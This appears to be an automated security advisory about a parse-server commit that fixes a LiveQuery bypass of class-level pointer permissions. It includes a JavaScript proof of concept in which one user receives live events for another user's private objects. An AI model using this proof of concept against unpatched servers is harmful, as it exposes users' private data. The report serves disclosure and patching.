Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 6c3317a
Author: Manuel
Date: 2026-03-20T02:17:14Z
Commit Message
fix: LiveQuery bypasses CLP pointer permission enforcement ([GHSA-fph2-r4qg-9576](https://github.com/parse-community/parse-server/security/advisories/GHSA-fph2-r4qg-9576)) (#10250)
Pull Request
PR: #10250 - fix: LiveQuery bypasses CLP pointer permission enforcement (GHSA-fph2-r4qg-9576)
Labels: state:released-alpha
Description:
Issue
LiveQuery bypasses CLP pointer permission enforcement ([GHSA-fph2-r4qg-9576](https://github.com/parse-community/parse-server/security/advisories/GHSA-fph2-r4qg-9576))
Tasks
Analysis
Vulnerability Type: Authorization Bypass
Severity: High
Description
Before the patch, the LiveQuery server did not properly enforce Class-Level Permissions (CLP) pointer-based user field restrictions, allowing unauthorized users to receive live query updates for objects they should not have access to. This patch adds explicit enforcement of pointer permissions (readUserFields/writeUserFields) in LiveQuery events, ensuring only authorized users receive notifications based on pointer ownership. This prevents unauthorized data leakage through LiveQuery subscriptions.
Affected Code
```javascript
// Call site in the LiveQuery server where the class-level permission check
// is applied to each event before it is delivered to a subscribed client.
await this._matchesCLP(
  classLevelPermissions,
  message.currentParseObject,
  client,
  requestId,
  op
);
```
Proof of Concept
1. Configure a class 'PrivateMessage' with CLP: { readUserFields: ['owner'] }.
2. Create userA and userB.
3. UserB subscribes to LiveQuery on 'PrivateMessage'.
4. UserA creates a 'PrivateMessage' object with 'owner' pointer set to userA.
Expected Exploit Behavior Before Patch:
- UserB receives LiveQuery 'create' events for objects owned by userA despite no permission.
Commands:
```javascript
// Proof of concept from the report. Assumes the Parse JS SDK is already
// initialized (Parse.initialize, Parse.serverURL, Parse.liveQueryServerURL)
// and that 'PrivateMessage' has CLP { readUserFields: ['owner'] } (step 1).
const userA = new Parse.User();
userA.setUsername('userA');
userA.setPassword('pass');
await userA.signUp();
const userB = new Parse.User();
userB.setUsername('userB');
userB.setPassword('pass');
await userB.signUp();
// userB subscribes with its own session token; it owns no PrivateMessage.
const query = new Parse.Query('PrivateMessage');
const subscription = await query.subscribe(userB.getSessionToken());
subscription.on('create', obj => { console.log('Unauthorized live event:', obj); });
// Create a message owned by userA. Before the patch, the 'create' handler
// above fired for userB even though readUserFields restricts reads to the owner.
const msg = new Parse.Object('PrivateMessage');
msg.set('owner', userA);
msg.set('content', 'secret');
await msg.save(null, { useMasterKey: true });
```
Before the patch, userB was notified of the creation of the message owned by userA, leaking its data.
After the patch, such events are no longer sent to users who do not satisfy the pointer permission.
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-20T06:00:41.147Z